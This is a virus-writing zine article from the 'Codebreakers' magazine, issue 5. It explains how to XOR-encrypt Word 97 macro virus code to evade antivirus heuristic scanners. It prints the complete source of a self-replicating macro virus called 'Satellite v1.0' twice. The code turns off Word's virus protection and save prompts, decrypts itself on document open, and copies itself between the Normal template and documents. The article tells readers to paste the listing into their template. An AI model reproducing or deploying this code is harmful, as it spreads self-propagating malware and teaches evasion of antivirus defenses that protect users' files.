Why use encryption in your macro virus by ThE wEiRd GeNiUs. So first of all a happy and viral newyear. This is already CB#5 and in this issue I would like to tell you a little about the reasons why I chose to to encrypt W97 macro's and I will give you some examples to get you started. You need to know something about VB programming. If you do not know how to make a macro virus it is wise to first get started with the macro tutes to learn to write macro bugs. Once you've got the hang of that get back to this point and continue reading :^) The reasons: Well that's fairly easy to answer. The AV world is not as lame as some people might think. Altough they are a few steps behind most of the time, they are pretty smart in developing strategy's to find and reveal unknown macro's using heuristic methods. I found that a lot of macro's are discovered because they use statements like 'import' and 'export' together with for example 'options.virusprotection = false' If the scanner finds these strings together it quickly assumes that it is dealing with a possible virus. When you encrypt these pieces of code it is much more difficult to discover your bug. As my efforts on this subject is still in a very early fase I did not yet implement polymorphism on the encryption routines themselves but with a little imagination that will be something where a creative writer can easily imagine and invent possibilities to make it happen. How it works: Up to know I've been working with a simple XOR encryption method I saw it first in a bug called Xute, were the author used this type of encryptions on strings. That's when I realised that it would also be possible to encrypt complete SUB's. The first problem I encountered was that whenever you decrypt code it has to be encrypted in an existing SUB, and that SUB needs to be called after decoding to make it work. Also very important is that you need to work with offsets. Satellite is not one of the best examples for that but my latest creation (Cross.Wonder) is a bit to complex to explain here. Find hereunder a copy of Satellite with an explanation of the code: 'Sattelite v1.0 >> This line starts at 42 (The first offset and infection marker.) 'Document >> Marker to determine if the code is in the NormalTemplate or ActiveDocument Private Function encr(s, k As Integer) Dim r: r = "": For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next: encr = r End Function >> This is the complete en-decryption routine using Xor. It gets called by Document_Open() Private Sub Document_Open() On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH) >> Here I count the number of chars in the document to determine if it was changed when closing the document again. >> It's lame but significantly improved in Cross.Wonder WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1) >> Check for the marker to determine location (ActiveDocument or NormalTemplate) If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule >> Speaks for itself... With Iam: .ReplaceLine 101, Kar: Z = .CountOfLines - 27: For X = 63 To Z: >> Store the number of characters in the document within the code for later use (Document_Close) If W = 20 Then W = 0 decrypt = .Lines(X, 1): W = W + 2: Y = Len(decrypt): Y = Y - 1: decrypt = Right$(decrypt, Y): .ReplaceLine X + 20, encr(decrypt, (W)): Next X: End With Call ThisDoc: Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule: Flag = 0: GoTo Over Again: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Flag = 1 >> Here the code gets decrypted and executed. Over: With Iam: For X = 83 To 100: .ReplaceLine X, "'": Next X: End With If Flag = 0 Then GoTo Again >> And here the decrypted code gets deleted again whenever it was decrypted and used. End Sub Private Sub ThisDoc() ' ' 'Ml"Gppmp"Pgqwog"Lgzv 'Etthmgepmkj*AjefhaGejgahOa}$9$s`Gejgah@mwefha` 'Ivroihu(PotsuVtirceroih&;&@gjuc 'Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m 'Yo~*Ki~Ikxxcox*7*Ki~c|oNeigod~$\HZxe`oi~$\HIegzedod~y";#$IenoGenfo '_ix,Bc~aOm~~ei~,1,Bc~am`Xia|`mxi"ZN\~cfiox"ZNOca|cbibx$=%"OchiAchy`i '@G.3.@a|cobZkc~bozk XL^|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?' 'QY0-0QsdyfuTse}u~d>FR@bzusd>FRS}`~u~dc8!9>Stu]te|u>\y~uc8$"<0!9 '[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw|2\}`[|afs~~wv2/2F`gw2W~aw2\}`[|afs~~wv2/2Ts~aw ']r4AWugq> The ENcrypted code.... (Note the REM marker (') in the beginning of every encrypted line. >> This marker needs to be removed during decryption!) On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Options.VirusProtection = False Options.SaveNormalPrompt = False Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(42, 1) AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(42, 1) If UCase(NI) = "'SATTELITE V1.0" Then NormInstalled = True Else NormInstalled = False If UCase(NI) <> "'SATTELITE V1.0" And NormCarrier.CountOfLines > 0 Then Exit Sub If UCase(AI) = "'SATTELITE V1.0" Then ActInstalled = True Else ActInstalled = False If UCase(AI) <> "'SATTELITE V1.0" And ActCarrier.CountOfLines > 0 Then Exit Sub If NormInstalled = True And ActInstalled = True Then Exit Sub If NormInstalled = False Then: Set Infection = NormCarrier: Set Carrier = ActCarrier: Else: Set Infection = ActCarrier: Set Carrier = NormCarrier With Carrier: VirCode = .Lines(1, .CountOfLines): End With With Infection: .DeleteLines 1, .CountOfLines: .InsertLines 1, VirCode If NormInstalled = False Then .ReplaceLine 43, "'NormalTemplate" Else .ReplaceLine 43, "'Document" End With >> And the DEcrypted code.... As you can see the code gets decrypted in a sub named ThisDoc >> and then is called from Auto_Open. If you decrypt your code in Auto_Open it won't work! >> You need to put the code in a different sub and then call that sub! ' 3411 >> Number of characters in document (Mentioned earlier) End Sub Private Sub Document_Close() WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1) >> Just another check to see where we are... CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH) >> Now the document is closed we check if it has been changed. >> If it is it will ask the user politely if you want to save the changes. >> If the document hasn't been changed we just save it anyway :^) If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Kar2 = Iam.Lines(101, 1): Iam.ReplaceLine 101, "'": NormalTemplate.Save: If Kar = Kar2 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument End Sub OK, that's it. As you can see it is quite simple. If you want to play around with it copy the code underneath into the class section of your NormalTemplate. Make sure that the first line is on line number 42! In the next issue of the codebreakers magazine I will go much more deeper into this stuff but for now I want you to THINK. Check how it works learn from it and it will help you to become a creative writer. That's were this is about. Everyone can write a virus, especially a macro virus. But only a few stand out because these persons use their imagination and creativity to come up with something new. Thanks go to the author of Xute. You made me realise that this was possible :^) 'Sattelite v1.0 'NormalTemplate Private Function encr(s, k As Integer) Dim r: r = "": For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next: encr = r End Function Private Sub Document_Open() On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH) WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1) If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule With Iam: .ReplaceLine 101, Kar: Z = .CountOfLines - 27: For X = 63 To Z: If W = 20 Then W = 0 decrypt = .Lines(X, 1): W = W + 2: Y = Len(decrypt): Y = Y - 1: decrypt = Right$(decrypt, Y): .ReplaceLine X + 20, encr(decrypt, (W)): Next X: End With Call ThisDoc: Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule: Flag = 0: GoTo Over Again: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Flag = 1 Over: With Iam: For X = 83 To 100: .ReplaceLine X, "'": Next X: End With If Flag = 0 Then GoTo Again End Sub Private Sub ThisDoc() ' ' 'Ml"Gppmp"Pgqwog"Lgzv 'Etthmgepmkj*AjefhaGejgahOa}$9$s`Gejgah@mwefha` 'Ivroihu(PotsuVtirceroih&;&@gjuc 'Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m 'Yo~*Ki~Ikxxcox*7*Ki~c|oNeigod~$\HZxe`oi~$\HIegzedod~y";#$IenoGenfo '_ix,Bc~aOm~~ei~,1,Bc~am`Xia|`mxi"ZN\~cfiox"ZNOca|cbibx$=%"OchiAchy`i '@G.3.@a|cobZkc~bozk XL^|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?' 'QY0-0QsdyfuTse}u~d>FR@bzusd>FRS}`~u~dc8!9>Stu]te|u>\y~uc8$"<0!9 '[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw|2\}`[|afs~~wv2/2F`gw2W~aw2\}`[|afs~~wv2/2Ts~aw ']r4AWugq